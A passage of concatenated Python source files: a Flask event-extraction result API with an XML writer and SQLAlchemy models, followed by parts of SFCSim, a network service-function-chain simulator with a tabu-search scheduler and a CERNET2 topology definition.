break
elif (content_target[point_j2] == trigger_target[point_i2]):
point_j2 = point_j2 + 1
point_i2 = point_i2 + 1
flag2 = flag2 + 1
if (flag2 == trigger_target_length):
location2 = j2
# target
target_target = coreData[i + 4]
target_target_length = len(target_target)
for j3 in range(content_length):
if (content_target[j3] == target_target[0]):
point_j3 = j3
flag3 = 0
point_i3 = 0
for k3 in range(target_target_length):
if (content_target[point_j3] != target_target[point_i3]):
break
elif (content_target[point_j3] == target_target[point_i3]):
point_j3 = point_j3 + 1
point_i3 = point_i3 + 1
flag3 = flag3 + 1
if (flag3 == target_target_length):
location3 = j3
if (coreData[i + 3] in content):
left1 = 0
right1 = content.index(coreData[i + 3])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left1:right1])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
nodeSource = doc.createElement('source')
nodeSource.setAttribute('begin', str(location + location1))
nodeSource.setAttribute('end', str(location + location1 + source_target_length - 1))
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeSource.appendChild(doc.createTextNode(coreData[i + 3]))
nodeEvent.appendChild(nodeSource)
if (coreData[i + 5] in content):
left2 = content.index(coreData[i + 3]) + len(coreData[i + 3])
right2 = content.index(coreData[i + 5])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left2:right2])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
nodeTrigger = doc.createElement('trigger')
nodeTrigger.setAttribute('triggerid', coreData[i + 6][0:3])
nodeTrigger.setAttribute('begin', str(location + location2))
nodeTrigger.setAttribute('end', str(location + location2 + trigger_target_length - 1))
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeTrigger.appendChild(doc.createTextNode(coreData[i + 5]))
nodeEvent.appendChild(nodeTrigger)
if (coreData[i + 4] in content):
left3 = content.index(coreData[i + 5]) + len(coreData[i + 5])
right3 = content.index(coreData[i + 4])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left3:right3])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
nodeTarget = doc.createElement('target')
nodeTarget.setAttribute('begin', str(location + location3))
nodeTarget.setAttribute('end', str(location + location3 + target_target_length - 1))
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeTarget.appendChild(doc.createTextNode(coreData[i + 4]))
nodeEvent.appendChild(nodeTarget)
if (coreData[i + 4] in content):
left3 = content.index(coreData[i + 4]) + len(coreData[i + 4])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left3:])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
childParagraphBefore = childParagraphNow
childSentenceBefore = childSentenceNow
# 开始写xml文档
# i = 1
fp = open('C:\\Users\\wxn\\Desktop\\1\\e_result_' + index + '.xml', 'w')
doc.writexml(fp, indent='\t', addindent='\t', newl='\n', encoding="gbk")
# response = make_response(
# send_from_directory("C:\\Users\\wxn\\Desktop\\1", 'e_result_' + index + '.xml', as_attachment=True))
return "dahsi"
@eventResultApi.route('/<id>', methods=['GET'])
def get_event_result(id):
try:
table_name = 'rs_analysis_project_' + id
AnalycisEventResult.__table__.name = table_name
results = AnalycisEventResult.query.filter(AnalycisEventResult.text_id == id).all()
result_data = []
for result in results:
result_data.append(result.as_dct())
return jsonify(code=20000, flag=True, message="查询成功", data={"total": len(result_data), "rows": result_data})
except Exception as e:
print(e)
return jsonify(code=20001, flag=False, message="查询分析结果失败")
@eventResultApi.route('/detail/<project_id>/<text_id>', methods=['GET'])
def get_event_detail(project_id, text_id):
project = AnalysisProject.query.get(project_id)
# 查询content
textlib_id = project.textlibrary_id
textlibrary_data_tablename = 'rs_textlibrary_data_%s' % textlib_id
TextLibraryData.__table__.name = textlibrary_data_tablename
text_data = TextLibraryData.query.get(text_id)
text_dict = text_data.as_dict()
paragraphs = text_data.content.decode("utf-8").split(u"\u3000")
# remove the empty str
paragraphs = filter(None, paragraphs)
res = []
for p in paragraphs:
p = '\t' + p
res.append(p)
text_dict.update({"content": res})
# 查询result
result_tablename = 'rs_analysis_event_result_%s' % project_id
AnalycisEventResult.__table__.name = result_tablename
result = AnalycisEventResult.query.filter(AnalycisEventResult.text_id == text_id).all()
result = result[0].as_dict()['event_result']
result = json.loads(result, encoding='utf-8',strict=False)
results = []
for i_result in result:
origin = i_result["origin"].split(" ")
content = i_result["content"].encode("utf-8")
# get Source
source = origin[2]
if "source" in i_result and i_result["source"] != '---':
source = i_result["source"]
target = origin[3]
if "target" in i_result and i_result["target"] != '---':
target = i_result["target"]
if "eventroot" in i_result and i_result["eventroot"] != '---':
ls = i_result["eventroot"].split(" ")
if len(ls) > 1:
event_code = i_result["eventroot"].split(" ")[1]
else:
event_code = i_result["eventroot"].split(" ")[0]
else:
event_code = origin[4]
event_code += " "
if "eventtext" in i_result:
event_code += i_result["eventtext"]
else:
event_code += "---"
results.append({"source": source, "target": target, "event": event_code, "location": i_result["location"],
"rs": source+" " + event_code + " " + target, "content": content,"sentenceTime": i_result["sentenceTime"]})
return jsonify(code=20000, flag=True, message="查询成功", text=text_dict, events=results)
```
#### File: resource/model/analysisProjectResultModelSubThread.py
```python
from resource import db
class AnalycisEventResultSubThread(db.Model):
# 事件分类结果
id = db.Column(db.Integer, primary_key=True)
text_id = db.Column(db.String(255))
recall_rate = db.Column(db.DECIMAL)
accuracy_rate = db.Column(db.DECIMAL)
event_num = db.Column(db.Integer)
event_result = db.Column(db.Text)
def as_dict(self):
return {c.name: getattr(self, c.name) for c in self.__table__.columns}
def __repr__(self):
return '<Analysis_Event_Result {}>'.format(self.id)
```
#### File: PetrarchChineseServer/resource/mysqldb.py
```python
# -*- coding: utf-8 -*-
# import mysql.connector
#
#
# def get_db():
# mydb = mysql.connector.connect(
# host="192.168.3.11",
# user="root",
# passwd="<PASSWORD>",
# database="SoftwareEngineering"
# )
#
# return mydb
#
#
# def create_textlib_date(textlib_id):
# table_name = 'rs_textlibrary_data_%s' % textlib_id
# drop_sql = 'DROP TABLE IF EXISTS {};'.format(table_name)
# create_sql = 'CREATE TABLE IF NOT EXISTS {}(' \
# 'id int(11) not null primary key,' \
# 'title varchar(255),' \
# 'summary text,' \
# 'keywords varchar(255),' \
# 'publish_time datetime,' \
# 'author varchar(255),' \
# 'source varchar(255),' \
# 'page varchar(20),' \
# 'content text,' \
# 'url varchar(512),' \
# 'publish_source varchar(255),' \
# 'create_time datetime,' \
# 'is_delete int(11)' \
# ');'.format(table_name)
#
# mydb = get_db()
# cursor = mydb.cursor()
# cursor.execute(drop_sql)
# cursor.execute(create_sql)
# mydb.commit()
#
# db_sql = 'show databases'
# cursor.execute(db_sql)
# print(cursor.fetchall())
# mydb.disconnect()
#
# def create_analysis_result(project_id):
# table_name = 'rs_analysis_event_result_%s' % project_id
# drop_sql = 'DROP TABLE IF EXISTS {}'.format(table_name)
# create_sql = 'create table IF NOT EXISTS {}(' \
# 'id int(20) not null primary key,'\
# 'text_id varchar(255) not null,'\
# 'recall_rate decimal(10,2) not null,'\
# 'accuracy_rate decimal(10,2) not null,'\
# 'event_num int(11) not null,'\
# 'event_result text not null'\
# ')'.format(table_name)
#
# def test():
# # 动态生成两个类型的表,没有返回任何信息
# create_textlib_date('1')
# # create_analysis_result('1')
#
# # 外边调用执行任意sql语句
# mydb = get_db()
# cursor = mydb.cursor()
#
# sql = "INSERT INTO `SoftwareEngineering`.`test` (`id`, `testcol`) VALUES (%s, %s);"
# # sql = "SELECT * FROM SoftwareEngineering.test;"
# val = ("4", "444")
# # cursor.execute(sql, val)
# db_sql = "SHOW DATABASES"
# cursor.execute(db_sql)
# result = cursor.fetchone()
# # mydb.commit()
# print(result)
# mydb.disconnect()
#
# if __name__ == '__main__':
# test()
``` |
{
"source": "1547591994/SFCSim",
"score": 3
} |
#### File: sfcsim/algorithms/common.py
```python
import numpy as np
def show_solutions(solutions,sfc_id):
print(sfc_id,' ',len(solutions[sfc_id]))
for solution in solutions[sfc_id]:
print(' ',solution)
def find_all_path(graph,start,end,path=[]): # 找到网络里一个节点到另一个节点的所有路径
path = path +[start]
if start == end:
return [path]
paths = [] #存储所有路径
for node in graph[start]:
if node not in path:
newpaths = find_all_path(graph,node,end,path)
for newpath in newpaths:
paths.append(newpath)
return paths
def find_network_all_path(graph): #找到网络所有路径
paths={}
nodes=graph.nodes
for node1 in nodes:
paths[node1]={}
for node2 in nodes:
if node2 !=node1:
paths[node1][node2]=find_all_path(graph,node1,node2)
return paths
def is_condition_met(datas): #判断datas数组后边的数是否比前面大
lens=len(datas)-1
for j in range(lens):
if(datas[j]>datas[j+1]):
return False
return True
def count_mode(nf_number,node_number): #给出单条路径上符合条件的部署方案
sum=int((node_number**nf_number-1))
deploy=[]
for count in range(sum+1):
datas=np.zeros((nf_number,), dtype=int)
data=count
i=0
while(data>0):
datas[nf_number-1-i]=(data%node_number)
data=int(data/node_number)
i=i+1
if is_condition_met(datas)==True:
deploy.append(list(datas))
return deploy
def get_deploy_from(path,sfc,mode):
lens=len(mode)
solution={'node':{},'edge':{}}
for i in range(lens):
solution['node'][i+1]=path[mode[i]].get_id() #记录nf部署方案
edge=[]
if i ==0: #记录虚拟链路部署方案
for j in range(mode[0]+1):
edge.append(path[j].get_id())
else:
for j in range(mode[i-1],mode[i]+1):
edge.append(path[j].get_id())
if len(edge)==0: #表示部署在节点内部的方法
edge=[path[mode[i-1]].get_id(),path[mode[i-1]].get_id()]
elif len(edge)==1:
edge.append(edge[0])
solution['edge'][i+1]=edge
edge=[]
for j in range(mode[lens-1],len(path)):
edge.append(path[j].get_id())
if len(edge)==1:
edge.append(sfc.get_out_node())
solution['edge'][lens+1]=edge
return solution
def find_sfc_solution(path,sfc): #找到一个网络里对于一条sfc的所有解决方案,以字符串record的格式存储
nf_number=sfc.get_length()-2
node_number=len(path)
deploy_modes=count_mode(nf_number,node_number)
solution=[]
for mode in deploy_modes:
solution.append(get_deploy_from(path,sfc,mode))
return deploy_modes,solution
def get_path_delays(network,path):
lens=len(path)-1
delay=0
for i in range(lens):
delay=delay+network.G[path[i]][path[i+1]]['delay']
return delay
def find_sfcs_solutions(network,sfcs,n=1):#找到网络里所有sfc的所有部署方案,以字典格式存储{'sfc1':[{},{},{}]}
all_paths=find_network_all_path(network.G)
all_solutions={}
all_modes={}
for sfc in sfcs.get_sfcs():
all_solutions[sfc.get_id()]=[]
solutions=[]
modes=[]
sfc_paths=all_paths[network.get_node(sfc.get_in_node())][network.get_node(sfc.get_out_node())]
path_length=[]
for path in sfc_paths: #对路径进行筛选,支取延迟最小的n条
path_length.append(get_path_delays(network,path))
index=np.array(path_length).argsort()
lens=n if len(sfc_paths)>n else len(sfc_paths)
sfc_paths2=[]
for i in range(lens):
sfc_paths2.append(sfc_paths[index[i]])
for path in sfc_paths2:
if get_path_delays(network,path)<sfc.get_delay(): #满足条件的路径
mode,solution=find_sfc_solution(path,sfc)
modes.extend(mode)
solutions.extend(solution) #获取sfc在这条路径下的所有部署方案
all_modes[sfc.get_id()]=modes
all_solutions[sfc.get_id()]=solutions
return all_modes,all_solutions
def records_node_to_str(records): #将node类的部署记录转化为字符串形式的部署记录
new_records={}
for sfc_id in records:
new_records[sfc_id]={'node':{},'edge':{}}
for key in records[sfc_id]:
if key =='node':
for num in records[sfc_id][key]:
new_records[sfc_id][key][num]=records[sfc_id][key][num].get_id()
elif key =='edge':
for num in records[sfc_id][key]:
path=[]
for node in records[sfc_id][key][num]:
path.append(node.get_id())
new_records[sfc_id][key][num]=path
return new_records
def records_str_to_num(records,all_sfc_deploy_records): #将字符串类的部署记录转化为数字形式的部署记录
new_records={}
for sfc_id in all_sfc_deploy_records:
if sfc_id in records :
if (records[sfc_id] !=-1) :
lens=len(all_sfc_deploy_records[sfc_id])
for i in range(lens):
if(all_sfc_deploy_records[sfc_id][i] == records[sfc_id]):
new_records[sfc_id]=i
else:
new_records[sfc_id]=-1
else:
new_records[sfc_id]=-1
return(new_records)
```
#### File: sfcsim/algorithms/TS_scheduler.py
```python
from sfcsim.classes import *
from sfcsim.algorithms import common
import time
class TS_scheduler(dynamic_scheduler):
def __init__(self,tabu_length=10,iteration=50,stop_condition=5,log=False): #log=means not to print deployment procedure information
super(TS_scheduler, self).__init__(log=log)
self.tabu_list=[]
self.tabu_length=tabu_length
self.stop_condition=stop_condition
self.iteraction_count=iteration #最大迭代次数
self.max_deploy_record={} #存储最优解的解量
self.max_deploy_solution={} #存储最优解的数字量
self.global_max_deploy_record={} #存储全局最优解记录
self.grade_list=[] #存储所有迭代的最优分数
###############################################
self.all_sfc_deploy_solutions={} #存储对所有sfc的所有可行方案,以字典格式存储{'sfc1':[{},{},{}],...}
self.solutions_length={} #存储所有sfc的所有可能部署方案个数
self.last_num=0 #邻域变化之前的解
#清除网络的所有sfc、vnf部署,同时清空记录
def clear_network(self,network,sfcs):
records_list=[]
for sfc_id in self.get_records():
records_list.append(sfc_id) #存储key,防止字典/列表长度随迭代变化
for i in records_list:
self.remove_sfc(sfcs.get_sfc(i),network)
for node in network.get_nodes():
vnfs=network.get_vnfs(node.get_id())
vnfs_list=[]
for j in range(len(vnfs)):
vnfs_list.append(vnfs[j].get_name())
for i in vnfs_list:
network.delete_vnf(node.get_id(),i)
#检查服务的总流量大小
def check_score(self,record,sfcs):
grade=0
for sfc_id in record:
if 'node' in record[sfc_id] and 'edge' in record[sfc_id]:
if len(record[sfc_id]['node'])== sfcs.get_length(sfc_id)-2 and len(record[sfc_id]['edge'])== sfcs.get_length(sfc_id)-1:
for bandwidth in sfcs.get_bandwidths(sfc_id):
grade=grade+bandwidth
return grade
#通过记录执行部署操作并计算返回适应度
def deploy_sfc_by_records(self,sfcs,network,vnf_types,records):#通过记录部署所有服务功能链
for sfc_id in records:
if records[sfc_id] !=-1: #{}表示不部署这条sfc
log=True
sfc=sfcs.get_sfc(sfc_id)
for i in records[sfc_id]['node']:
if self.deploy_nf_scale_out(sfc,network.get_node(records[sfc_id]['node'][i]),i,vnf_types)!=True:
if sfc_id in self.get_records():
self.remove_sfc(sfc,network)
log=False
if log==False:
break #跳出1层循环
if log==False: #这条条sfc部署失败,执行下一条sfc的部署
continue
for j in records[sfc_id]['edge']:
edge_list=records[sfc_id]['edge'][j]
edge=[]
for m in range(len(edge_list)):
edge.append(network.get_node(edge_list[m]))
if self.deploy_link(sfc,j,network,edge)!=True: #链路部署失败,则将sfc删除
if sfc.get_id() in self.get_records():
self.remove_sfc(sfc,network)
log=False
if log==False:
break #跳出1层循环
fit=0
record=self.get_records()
for sfc_id in record: #所有sfc的虚拟链路相加之和
if 'node' in record[sfc_id] and 'edge' in record[sfc_id]:
if len(record[sfc_id]['node'])== sfcs.get_length(sfc_id)-2 and len(record[sfc_id]['edge'])== sfcs.get_length(sfc_id)-1:
for bandwidth in sfcs.get_bandwidths(sfc_id):
fit=fit+bandwidth
self.clear_network(network,sfcs)
return fit
#获得进行邻域操作之后的新部署方案
def get_new_deploy_solution(self,neighbour):
self.last_num=copy.deepcopy(self.max_deploy_solution[neighbour[0]])
if neighbour[1] !=0:
self.max_deploy_solution[neighbour[0]]+=neighbour[1]
self.max_deploy_record[neighbour[0]]=self.all_sfc_deploy_records[neighbour[0]][self.max_deploy_solution[neighbour[0]]]
else:
self.max_deploy_solution[neighbour[0]]=-1
self.max_deploy_record[neighbour[0]]=-1
#回到邻域操作之前的部署方案
def get_last_deploy_solution(self,neighbour):
self.max_deploy_solution[neighbour[0]]=self.last_num
if self.last_num!=-1:
self.max_deploy_record[neighbour[0]]=self.all_sfc_deploy_records[neighbour[0]][self.max_deploy_solution[neighbour[0]]]
else:
self.max_deploy_record[neighbour[0]]=-1
# 获得一条sfc的部署邻域
def get_neighbour(self,sfc_id):
neighbour=[]
num=self.max_deploy_solution[sfc_id]
max_num=self.solutions_length[sfc_id] #获得最大id
if num>0 :
neighbour.append((sfc_id,-1))
if num<max_num-1:
neighbour.append((sfc_id,1))
if num!=-1:
neighbour.append((sfc_id,0)) #0表示不部署这条sfc
# print('neighbour=>',neighbour)
return neighbour
# 获得单前解的所有邻域
def get_neighbours(self):
neighbours=[]
for sfc_id in self.max_deploy_record:
neighbours.extend(self.get_neighbour(sfc_id))
return neighbours
#判断邻域是否在禁忌表中
def is_in_tabu_list(self,neighbour): #判断邻域是否在禁忌列表中
lens=len(self.tabu_list)
for data in self.tabu_list:
if data[0]== neighbour[0] and data[1] == -neighbour[1]: #
return True
return False
#计算邻域的适应度
def calculate_fits(self,sfcs,network,vnf_types,neighbours):
fits=[]
for neighbour in neighbours:
self.get_new_deploy_solution(neighbour) #进入新领域
fits.append(self.deploy_sfc_by_records(sfcs,network,vnf_types,self.max_deploy_record))
self.get_last_deploy_solution(neighbour) #回退到原始最优解
return fits
#执行一次搜索
def single_search(self,network,sfcs,vnf_types):
neighbours=self.get_neighbours() #获得解集合和对应邻域操作 neighbours=[('sfc1',1),('sfc2',1),...]
# print('neighbours=>',neighbours)
fits=self.calculate_fits(sfcs,network,vnf_types,neighbours) #计算所有邻域的适应度
candidate_grade=max(fits) #获取最大适应度
neighbour=neighbours[fits.index(candidate_grade)] #获取最大适应度所在邻域
if candidate_grade > self.max_grade: #藐视法则
print('************ new solution***********')
self.max_grade = candidate_grade
if self.is_in_tabu_list(neighbour):
self.tabu_list.remove(neighbour)
self.tabu_list.append(neighbour)
if len(self.tabu_list) > self.tabu_length: #判断该禁忌列表长度是否以达到限制,是的话移除最初始的move
self.tabu_list.remove(self.tabu_list[0])
self.get_new_deploy_solution(neighbour)
self.global_max_deploy_record=copy.deepcopy(self.max_deploy_record)
return True
else:
print('************ old solution***********')
while(self.is_in_tabu_list(neighbour)):
fits[fits.index(candidate_grade)]=-1 #把最优解设置为最小值
candidate_grade=max(fits)
neighbour=neighbours[fits.index(candidate_grade)] #获取最大适应度所在邻域
self.tabu_list.append(neighbour)
if len(self.tabu_list) > self.tabu_length: #判断该禁忌列表长度是否以达到限制,是的话移除最初始的move
self.tabu_list.remove(self.tabu_list[0])
self.get_new_deploy_solution(neighbour) #更新最优解
return False
#初始化,提前计算一些常用的量
def init(self,init_record,network,sfcs):
self._scheduler__records=init_record
self._dynamic_scheduler__records=init_record
self.__records=self.get_records() #更新初始解
self.max_grade=self.check_score(init_record,sfcs) #更新初始目标值
self.all_sfc_deploy_solutions,self.all_sfc_deploy_records=common.find_sfcs_solutions(network,sfcs,1) #先找到所有可行解的部署方案,第一项是数字记录,第二项为字符串记录
for sfc_id in self.all_sfc_deploy_solutions: #每一条sfc的部署方案
self.solutions_length[sfc_id]=len(self.all_sfc_deploy_solutions[sfc_id])
self.max_deploy_record=common.records_node_to_str(self.get_records()) #存储最优解的字符串量
for sfc_id in self.all_sfc_deploy_records:
if sfc_id not in self.max_deploy_record:
self.max_deploy_record[sfc_id]=-1
self.max_deploy_solution=common.records_str_to_num(self.max_deploy_record,self.all_sfc_deploy_records)
self.clear_network(network,sfcs)
#主函数
def deploy_sfcs(self,network,sfcs,vnf_types,init_record):
start = time.clock()
self.init(init_record,network,sfcs)
for i in range(self.iteraction_count):
if self.single_search(network,sfcs,vnf_types)==True: #进行一轮搜索
count=0
else:
count=count+1
self.grade_list.append(self.max_grade)
end = time.clock()
print('time=>',end-start,'s','max grade=>',self.max_grade)
if(count>self.stop_condition):
print("迭代%d次为发现更优解,迭代停止"%(self.stop_condition))
break
end = time.clock()
print('execution time=>',end-start,'s')
print('optimal solution=>',self.max_grade,' =>',self.global_max_deploy_record)
```
#### File: sfcsim/classes/mobiel_sfc.py
```python
from sfcsim.classes.sfc import *
class mobile_sfc(sfc):
'''
mobile_sfc类,输入节点随时间移动的sfc,详情见network基础类设计文档
属性值:
id sfc的唯一标识
atts sfc的属性,包含以下:
in_node 输入节点
in_nodes 所有会移动到的输入节点
out_node 输出节点
nfs 网络功能集合
bandwidths 链路带宽集合
delay 延时需求
duration 持续时间
profit 利润
nfs_detail nfs的一些细节信息(内部自动生成)
type sfc类型,内部自动生成,默认为1
vnf_types 全局的vnf_types实例,现有的vnf_types才会有sfc
属性方法:
太多了,我不想写,主要包含get、set、show三类方法
'''
def __init__(self,uuid,in_nodes,out_node,nfs=[],bandwidth=0,delay=0,duration=0,profit=0,vnf_types=[]):
if type(duration)==type([]): #判断duration长度和in_nodes长度是否相同
if len(in_nodes)!= len(duration):
print('the length of duration must the same as the length of in_nodes')
return False
super(mobile_sfc, self).__init__(uuid=uuid,in_node=in_nodes[0],out_node=out_node,nfs=nfs,bandwidth=bandwidth,\
delay=delay,duration=duration,profit=profit,vnf_types=vnf_types)
self.atts['in_nodes']=in_nodes
self.type=1
def set_atts(self,atts):
for key in atts:
if key in self.atts or key=='bandwidth':
if key =='nfs':
self.atts[key]=atts[key]
if vnf_types!=[]:
self.atts['bandwidths']=super()._sfc__calculate_link_bw(self.atts['bandwidths'][0])
self.atts['nfs_detail']=super()._sfc__calculate_resource(self.atts['nfs'])
elif key =='nfs_detail':
print('error!!!you can\'t set nfs_detail, it is calaulated automatically')
elif key =='in_nodes':
self.atts[key]=atts[key]
self.atts['in_node']=atts[key][0]
elif key =='nfs_detail':
print('error!!!you can\'t set nfs_detail, it is calaulated automatically')
elif key=='bandwidth':
if vnf_types!=[]:
self.atts['bandwidths']=super()._sfc__calculate_link_bw(atts[key])
self.atts['nfs_detail']=super()._sfc__calculate_resource(self.atts['nfs'])
else:
self.atts['bandwidths']=[bandwidth]
else:
self.atts[key]=atts[key]
else:
print('warning!!! no such key:',key)
def next_cycle(self): #用于动态部署调度器中自动更新一些信息
self.atts['service_time']+=1
service_time=self.atts['service_time'] #service_time增加1
if type(self.atts['duration'])==type([]): #非周期变化对应判断单前位置方案
index=-1
while(service_time>=0):
index=index+1
if(index==len(self.atts['in_nodes'])-1): #到达最后一个周期
if self.atts['duration'][index]==0: #最后一个周期为静态sfc
return False
else:
service_time=service_time-self.atts['duration'][index]
elif (index>len(self.atts['in_nodes'])-1): #超过最后一个周期
return True
else:
service_time=service_time-self.atts['duration'][index]
else:
index=int(service_time/self.atts['duration']) #周期变化对应判断单前位置方案
if (index>len(self.atts['in_nodes'])-1): #超过最后一个周期
return True
if self.atts['in_nodes'][index]==self.atts['in_node']: #没有更新输入节点,用户还未移动
return False
else:
self.atts['in_node']=self.atts['in_nodes'][index] #已经更新输入节点,用户已移动
return True
def is_life_end(self): #在nest_cycle运行之后判断是否达到生命周期
if type(self.atts['duration']) !=type([]): #duration设置为固定值
if self.atts['service_time']>=self.atts['duration']*len(self.atts['in_nodes']):
return True
else:
return False
elif self.atts['duration'][len(self.atts['duration'])-1] ==0: #最后一周期为静态,永远不会结束
return False
else:
service_time=self.atts['service_time']
for data in self.atts['duration']:
service_time=service_time-data
if(service_time<0):
return False
return True
```
#### File: sfcsim/networks/cernnet2.py
```python
from sfcsim.classes.network import *
from sfcsim.classes.sfc import *
from sfcsim.layout.cernnet2_layout import *
class cernnet2(network):
'''
研究组实验室的开放挑战,挑战目标:在底层网络上部署文件中的sfc,算法执行时间短且总部署流量大者取胜
属性值(cernnet继承network类,能使用network所有方法):底层网络,网络拓扑为cernnet结构,详情见http://www.cernet20.edu.cn/introduction.shtml
nodes 节点资源分布符合U(10~30)
G 链路延迟符合U(0.5,1.5) (ms)
vnf_types vnf_types类实例,所有类型vnf集合,一共八种
sfcs sfcs类实例,所需部署目标服务功能链
mMTC 30条 延迟分布U(5,10) 流量需求(0.1~0.5G) 长度 3~5nf
uRLLC 10条 延迟分布U(2,4) 流量需求(1~2G) 长度 1~2nf
eMBB 6条 延迟分布U(5,10) 流量需求(3~4G) 长度 3~5nf
下列属性方法能够打印出底层数据结构:
cernnet.vnf_types.show()
cernnet.sfc.show()
cernnet.show()
cernnet.draw()
'''
def __init__(self):
self.node1=node(uuid='node1',atts={'cpu':10,'access':False})
self.node2=node(uuid='node2',atts={'cpu':10,'access':False})
self.node3=node(uuid='node3',atts={'cpu':10,'access':False})
self.node4=node(uuid='node4',atts={'cpu':10,'access':False})
self.node5=node(uuid='node5',atts={'cpu':10,'access':False})
self.node6=node(uuid='node6',atts={'cpu':10,'access':False})
self.node7=node(uuid='node7',atts={'cpu':10,'access':False})
self.node8=node(uuid='node8',atts={'cpu':10,'access':False})
self.node9=node(uuid='node9',atts={'cpu':10,'access':False})
self.node10=node(uuid='node10',atts={'cpu':10,'access':False})
self.node11=node(uuid='node11',atts={'cpu':10,'access':False})
self.node12=node(uuid='node12',atts={'cpu':10,'access':False})
self.node13=node(uuid='node13',atts={'cpu':10,'access':False})
self.node14=node(uuid='node14',atts={'cpu':10,'access':False})
self.node15=node(uuid='node15',atts={'cpu':10,'access':False})
self.node16=node(uuid='node16',atts={'cpu':10,'access':False})
self.node17=node(uuid='node17',atts={'cpu':10,'access':False})
self.node18=node(uuid='node18',atts={'cpu':10,'access':False})
self.node19=node(uuid='node19',atts={'cpu':10,'access':False})
self.node20=node(uuid='node20',atts={'cpu':10,'access':False})
self.node21=node(uuid='node21',atts={'cpu':10,'access':False})
server_nodes=[self.node1,self.node2,self.node3,self.node4,self.node5,self.node6,self.node7,self.node8,self.node9,self.node10,\
self.node11,self.node12,self.node13,self.node14,self.node15,self.node16,self.node17,self.node18,self.node19,self.node20,self.node21]
access_nodes=[]
network.__init__(self,server_nodes+access_nodes)
self.generate_edges()
self.generate_nodes_atts()
self.generate_edges_atts()
self.vnf_types=vnf_types(vnf_types=[(vnf_type(name='type1',atts={'cpu':0},ratio=0.8,resource_coefficient={'cpu':1}))\
,vnf_type(name='type2',atts={'cpu':0},ratio=0.8,resource_coefficient={'cpu':1})\
,vnf_type(name='type3',atts={'cpu':0},ratio=1.2,resource_coefficient={'cpu':1.8})\
,vnf_type(name='type4',atts={'cpu':0},ratio=1.5,resource_coefficient={'cpu':1.5})\
,vnf_type(name='type5',atts={'cpu':0},ratio=1,resource_coefficient={'cpu':1.4})\
,vnf_type(name='type6',atts={'cpu':0},ratio=1,resource_coefficient={'cpu':1.2})\
,vnf_type(name='type7',atts={'cpu':0},ratio=0.8,resource_coefficient={'cpu':1.2})\
,vnf_type(name='type8',atts={'cpu':0},ratio=1,resource_coefficient={'cpu':2})])
self.sfcs=sfcs([
#uRTTC
sfc('sfc31','node16','node20',['type1'],1.7,2,0,0,self.vnf_types),\
sfc('sfc32','node5','node9',['type4'],1.4,2,0,0,self.vnf_types),\
sfc('sfc33','node8','node19',['type5'],1.7,4,0,0,self.vnf_types),\
sfc('sfc34','node16','node15',['type8', 'type6'],1.1,4,0,0,self.vnf_types),\
sfc('sfc35','node12','node9',['type8'],1.0,3.5,0,0,self.vnf_types),\
sfc('sfc36','node21','node13',['type2', 'type4'],1.3,4,0,0,self.vnf_types),\
sfc('sfc37','node16','node8',['type7'],1.7,3,0,0,self.vnf_types),\
sfc('sfc38','node3','node12',['type6'],1.2,3.1,0,0,self.vnf_types),\
sfc('sfc39','node12','node21',['type4'],2.0,3,0,0,self.vnf_types),\
sfc('sfc40','node3','node20',['type4', 'type8'],1.3,4,0,0,self.vnf_types),\
#mMTC
sfc('sfc1','node6','node11',['type1', 'type7', 'type4', 'type8', 'type2'],0.2,7,0,0,self.vnf_types),\
sfc('sfc2','node21','node12',['type3', 'type6', 'type2', 'type8', 'type4'],0.2,10,0,0,self.vnf_types),\
sfc('sfc3','node21','node17',['type6', 'type5', 'type4', 'type2'],0.4,9,0,0,self.vnf_types),\
sfc('sfc4','node17','node13',['type1', 'type7', 'type3', 'type6', 'type2'],0.4,10,0,0,self.vnf_types),\
sfc('sfc5','node11','node15',['type1', 'type8', 'type6'],0.5,10,0,0,self.vnf_types),\
sfc('sfc6','node20','node3',['type7', 'type5', 'type4'],0.5,7,0,0,self.vnf_types),\
sfc('sfc7','node2','node3',['type8', 'type6', 'type4', 'type1', 'type2'],0.2,7,0,0,self.vnf_types),\
sfc('sfc8','node19','node3',['type4', 'type1', 'type2', 'type8', 'type7'],0.3,5,0,0,self.vnf_types),\
sfc('sfc9','node19','node4',['type2', 'type5', 'type1', 'type6'],0.2,8,0,0,self.vnf_types),\
sfc('sfc10','node15','node13',['type5', 'type7', 'type1', 'type2'],0.3,10,0,0,self.vnf_types),\
sfc('sfc11','node9','node1',['type4', 'type6', 'type5', 'type1'],0.4,6,0,0,self.vnf_types),\
sfc('sfc12','node19','node16',['type3', 'type2', 'type8', 'type7', 'type4'],0.2,5,0,0,self.vnf_types),\
sfc('sfc13','node11','node10',['type7', 'type8', 'type5', 'type6'],0.2,10,0,0,self.vnf_types),\
sfc('sfc14','node20','node6',['type1', 'type4', 'type3', 'type8'],0.3,6,0,0,self.vnf_types),\
sfc('sfc15','node12','node20',['type7', 'type2', 'type3', 'type1'],0.4,9,0,0,self.vnf_types),\
sfc('sfc16','node15','node8',['type8', 'type2', 'type1', 'type6', 'type5'],0.2,8,0,0,self.vnf_types),\
sfc('sfc17','node1','node12',['type4', 'type5', 'type8', 'type7'],0.3,6,0,0,self.vnf_types),\
sfc('sfc18','node19','node6',['type5', 'type7', 'type6', 'type1', 'type8'],0.1,10,0,0,self.vnf_types),\
sfc('sfc19','node6','node4',['type1', 'type6', 'type5', 'type2'],0.4,6,0,0,self.vnf_types),\
sfc('sfc20','node21','node6',['type7', 'type6', 'type2', 'type5', 'type8'],0.4,6,0,0,self.vnf_types),\
sfc('sfc21','node6','node11',['type7', 'type1', 'type5'],0.1,10,0,0,self.vnf_types),\
sfc('sfc22','node19','node12',['type6', 'type1', 'type8', 'type2', 'type4'],0.5,10,0,0,self.vnf_types),\
sfc('sfc23','node21','node11',['type1', 'type6', 'type2', 'type4', 'type5'],0.1,10,0,0,self.vnf_types),\
